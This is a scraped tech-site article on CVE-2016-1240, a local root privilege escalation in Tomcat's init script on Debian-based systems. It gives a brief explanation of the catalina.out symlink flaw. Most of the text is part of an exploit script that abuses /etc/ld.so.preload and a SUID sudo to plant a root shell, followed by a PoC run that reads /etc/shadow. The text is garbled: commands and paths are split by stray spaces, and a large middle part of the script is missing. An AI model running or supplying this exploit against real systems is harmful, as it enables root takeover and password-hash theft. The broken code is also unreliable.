Shulou(Shulou.com)06/01 Report--

Vulnerability principle when installing Tomcat using apt-get in a Debian system, the program automatically creates an automatic script The script is located at / etc/init.d/tomcat* The code is 171 # Run the catalina.sh script as a daemon172 set + e 173 touch "$CATALINA_PID"$CATALINA_BASE" / logs/catalina.out174 chown $TOMCAT7_USER "$CATALINA_PID"$CATALINA_BASE" / logs/catalina.out175 start-stop-daemon-- start- b-u "$TOMCAT7_USER"-g "$TOMCAT7_GROUP"\ 176c "$TOMCAT7_USER"-d "$CATALINA_TMPDIR"-p "$CATALINA_PID"\ 177-x / bin/bash-- -c "$AUTHBIND_COMMAND $TOMCAT_SH" 178 status= "$? 179 set + a-e problem occurs on line 174th When the Tomcat service is restarted, the owner of the log file catalina.out is changed to the Tomcat user, and the startup script is usually called by the root user. If you change the catalina.out to a link to an arbitrary file, it will cause the user to read any system file with high permissions. Vulnerability impact range Tomcat 8 / etc/ld.so.preloadecho-e "\ n [+] Tomcat restarted. The / etc/ld.so.preload file got created with tomcat privileges:\ n`ls-l / etc/ ld.so.preload` "echo-e"\ n [+] Adding $PRIVESCLIB shared lib to / etc/ld.so.preload "echo-e"\ n [+] The / etc/ld.so.preload file now contains:\ n`cat / etc/ ld.so.preload` "# Escalating privileges via the SUID binary (e.g. / usr/bin/sudo) echo-e"\ n [+] Escalating privileges via The $SUIDBIN SUID binary to get root! "sudo-- help 2 > / dev/null > / dev/null # Check for the rootshellls-l $BACKDOORPATH | grep rws | grep-Q rootif [$?-eq 0] Then echo-e "\ n [+] Rootshell got assigned root SUID perms at:\ n`ls-l $BACKDOORPATH`" echo-e "\ n\ 033 [94mPlease tell me you're seeing this too;)\ 033 [0m" else echo-e "\ n [!] Failed to get root "cleanexit 2fi # Execute the rootshellecho-e"\ n [+] Executing the rootshell $BACKDOORPATH now!\ n "$BACKDOORPATH-p-c" rm-f / etc/ld.so.preload Rm-f $PRIVESCLIB "$BACKDOORPATH-p # Job done.cleanexit 0Poc running instance tomcat7@ubuntu:/tmp$ iduid=110 (tomcat7) gid=118 (tomcat7) groups=118 (tomcat7) tomcat7@ubuntu:/tmp$ lsb_release-aNo LSB modules are available.Distributor ID: UbuntuDescription: Ubuntu 16.04 LTSRelease: 16.04Codename: xenialtomcat7@ubuntu:/tmp$ dpkg-l | grep tomcatii libtomcat7-java 7.0.68-1ubuntu0.1 all Servlet and JSP engine-- core librariesii tomcat7 7.0.68-1ubuntu0.1 all Servlet and JSP engineii tomcat7-common 7.0.68-1ubuntu0.1 all Servlet and JSP engine-- common filestomcat7@ubuntu:/tmp$. / tomcat-rootprivesc-deb.sh / var/log/tomcat7/catalina.out Tomcat 6-7-8 on Debian-based distros-Local Root Privilege Escalation ExploitCVE-2016-1240Discovered and coded by: Dawid Golunski http://legalhackers.com[+] Starting the exploit in [active] mode with the following privileges: uid=110 (tomcat7) gid=118 (tomcat7) groups=118 (tomcat7) [+] Target Tomcat log file set to / var/log/tomcat7/catalina.out [+] Compiling the privesc shared library (/ tmp/privesclib.c) [+] Backdoor/low-priv shell installed at:-rwxr-xr-x 1 tomcat7 tomcat7 1037464 Sep 30 22:27 / tmp/tomcatrootsh [+] Symlink Created at: lrwxrwxrwx 1 tomcat7 tomcat7 18 Sep 30 22:27 / var/log/tomcat7/catalina.out-> / etc/ld.so.preload [+] Waiting for Tomcat to re-open the logs/Tomcat service restart...You could speed things up by executing: kill [Tomcat-pid] (as tomcat user) if needed ) [+] Tomcat restarted. The / etc/ld.so.preload file got created with tomcat privileges:-rw-r--r-- 1 tomcat7 root 19 Sep 30 22:28 / etc/ld.so.preload [+] Adding / tmp/privesclib.so shared lib to / etc/ld.so.preload [+] The / etc/ld.so.preload file now contains: / tmp/privesclib.so [+] Escalating privileges via the / usr/bin/sudo SUID binary to get root! [+] Rootshell got assigned root SUID perms at:-rwsrwxrwx 1 root root 1037464 Sep 30 22:27 / tmp/tomcatrootshPlease tell me you're seeing this too ) [+] Executing the rootshell / tmp/tomcatrootsh now! Tomcatrootsh-4.3# iduid=110 (tomcat7) gid=118 (tomcat7) euid=0 (root) groups=118 (tomcat7) tomcatrootsh-4.3# whoamiroottomcatrootsh-4.3# head-n3 / etc/shadowroot:$6$ Oaf [cut]: 16912:0:99999:7:::daemon:*:16912:0:99999:7:::bin:*:16912:0:99999:7:::tomcatrootsh-4.3# exitexit

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.